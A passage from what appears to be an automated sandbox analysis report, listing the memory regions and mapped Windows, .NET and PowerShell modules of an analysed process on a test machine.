0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 484 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 485 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 486 start_va = 0x11c0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 487 start_va = 0x1200000 end_va = 0x12defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 488 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 489 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 490 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 491 start_va = 0x74af0000 end_va = 0x74b06fff entry_point = 0x74af0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 492 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 493 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 494 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 495 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 496 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 497 start_va = 0x1670000 end_va = 0x16affff entry_point = 0x0 region_type = private name = "private_0x0000000001670000" filename = "" Region: id = 498 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 499 start_va = 0x74600000 end_va = 0x746f4fff entry_point = 0x74610d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 500 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 501 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 502 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 503 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 504 start_va = 0x220000 end_va = 0x245fff entry_point = 0x220000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db") Region: id = 505 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 506 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 507 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 508 start_va = 0x15d0000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 509 start_va = 0x16b0000 end_va = 0x1aa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016b0000" filename = "" Region: id = 510 start_va = 0x71510000 end_va = 0x7155bfff entry_point = 0x71510000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 511 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 512 start_va = 0x6f120000 end_va = 0x6f14dfff entry_point = 0x6f120000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 532 start_va = 0x1ab0000 end_va = 0x1baffff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 533 start_va = 0x6f110000 end_va = 0x6f118fff entry_point = 0x6f11153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 534 start_va = 0x1f0000 end_va = 0x1f3fff entry_point = 0x1f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 535 start_va = 0x1130000 end_va = 0x115ffff entry_point = 0x1130000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 536 start_va = 0x1160000 end_va = 0x1163fff entry_point = 0x1160000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 537 start_va = 0x1bb0000 end_va = 0x1c15fff entry_point = 0x1bb0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 538 start_va = 0x70100000 end_va = 0x7016ffff entry_point = 0x70101f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 539 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75291319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 540 start_va = 0x1db0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 541 start_va = 0x70170000 end_va = 0x7017afff entry_point = 0x70171200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 542 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 543 start_va = 0x74190000 end_va = 0x74199fff entry_point = 0x74194d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 544 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 545 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c2128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 546 start_va = 0x63cf0000 end_va = 0x63d69fff entry_point = 0x63cf1f48 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 547 start_va = 0x1170000 end_va = 0x1170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 548 start_va = 0x1630000 end_va = 0x166ffff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 549 start_va = 0x634c0000 end_va = 0x63a6afff entry_point = 0x634c0000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 550 start_va = 0x720d0000 end_va = 0x7216afff entry_point = 0x720d0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 551 start_va = 0x1180000 end_va = 0x1180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 552 start_va = 0x1190000 end_va = 0x1190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 553 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 554 start_va = 0x11b0000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 555 start_va = 0x15b0000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x00000000015b0000" filename = "" Region: id = 556 start_va = 0x15c0000 end_va = 0x15cffff entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 557 start_va = 0x1610000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 558 start_va = 0x1620000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 559 start_va = 0x1c60000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 560 start_va = 0x1cc0000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 561 start_va = 0x1d00000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 562 start_va = 0x1df0000 end_va = 0x3deffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 563 start_va = 0x3f40000 end_va = 0x3f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 564 start_va = 0x629c0000 end_va = 0x634b7fff entry_point = 0x629c0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 565 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 566 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 567 start_va = 0x1c20000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 568 start_va = 0x3f80000 end_va = 0x4261fff entry_point = 0x3f80000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 569 start_va = 0x62220000 end_va = 0x629bbfff entry_point = 0x62220000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 570 start_va = 0x72040000 end_va = 0x720c0fff entry_point = 0x72040000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll") Region: id = 571 start_va = 0x619a0000 end_va = 0x62219fff entry_point = 0x619a0000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll") Region: id = 572 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74941220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 573 start_va = 0x6d230000 end_va = 0x6d511fff entry_point = 0x6d4bec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 574 start_va = 0x6d230000 end_va = 0x6d511fff entry_point = 0x6d4bec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 575 start_va = 0x1c30000 end_va = 0x1c32fff entry_point = 0x1c30000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 576 start_va = 0x3df0000 end_va = 0x3eaffff entry_point = 0x3df0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 577 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 578 start_va = 0x1c40000 end_va = 0x1c40fff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 579 start_va = 0x1c50000 end_va = 0x1c54fff entry_point = 0x1c50000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 580 start_va = 0x1c70000 end_va = 0x1cb0fff entry_point = 0x1c70000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 581 start_va = 0x6d230000 end_va = 0x6d511fff entry_point = 0x6d4bec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 582 start_va = 0x6d230000 end_va = 0x6d511fff entry_point = 0x6d4bec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 583 start_va = 0x1da0000 end_va = 0x1da7fff entry_point = 0x1da0000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 584 start_va = 0x3eb0000 end_va = 0x3ef2fff entry_point = 0x3eb0000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 585 start_va = 0x3f00000 end_va = 0x3f00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f00000" filename = "" Region: id = 586 start_va = 0x61760000 end_va = 0x61994fff entry_point = 0x61760000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 587 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67adf03c region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 588 start_va = 0x6d100000 end_va = 0x6d19bfff entry_point = 0x6d100000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 589 start_va = 0x6d1a0000 end_va = 0x6d224fff entry_point = 0x6d1a0000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll") Region: id = 590 start_va = 0x6edc0000 end_va = 0x6ee0afff entry_point = 0x6edc0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 591 start_va = 0x71fe0000 end_va = 0x72004fff entry_point = 0x71fe0000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 592 start_va = 0x3f10000 end_va = 0x3f10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f10000" filename = "" Region: id = 593 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 594 start_va = 0x614f0000 end_va = 0x615b2fff entry_point = 0x614f0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll") Region: id = 595 start_va = 0x615c0000 end_va = 0x6175dfff entry_point = 0x615c0000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll") Region: id = 596 start_va = 0x6d010000 end_va = 0x6d03cfff entry_point = 0x6d010000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll") Region: id = 597 start_va = 0x3f10000 end_va = 0x3f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 598 start_va = 0x4270000 end_va = 0x42c3fff entry_point = 0x4270000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 599 start_va = 0x60d80000 end_va = 0x60e93fff entry_point = 0x60d80000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 600 start_va = 0x60ea0000 end_va = 0x60fa3fff entry_point = 0x60ea0000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 601 start_va = 0x60fb0000 end_va = 0x614e5fff entry_point = 0x60fb0000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 602 start_va = 0x72020000 end_va = 0x72024fff entry_point = 0x72020000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 603 start_va = 0x3f20000 end_va = 0x3f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f20000" filename = "" Region: id = 604 start_va = 0x42d0000 end_va = 0x42dffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 605 start_va = 0x42e0000 end_va = 0x42effff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 606 start_va = 0x42f0000 end_va = 0x42fffff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 607 start_va = 0x4300000 end_va = 0x430ffff entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 608 start_va = 0x4310000 end_va = 0x431ffff entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 609 start_va = 0x4320000 end_va = 0x432ffff entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 610 start_va = 0x4330000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 611 start_va = 0x4340000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 612 start_va = 0x75300000 end_va = 0x75307fff entry_point = 0x753010e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 613 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 614 start_va = 0x4350000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 615 start_va = 0x43d0000 end_va = 0x43dffff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 616 start_va = 0x43e0000 end_va = 0x46b1fff entry_point = 0x43e0000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 617 start_va = 0x46c0000 end_va = 0x46c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046c0000" filename = "" Region: id = 618 start_va = 0x60720000 end_va = 0x60d70fff entry_point = 0x60720000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 619 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x6511b43c region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: 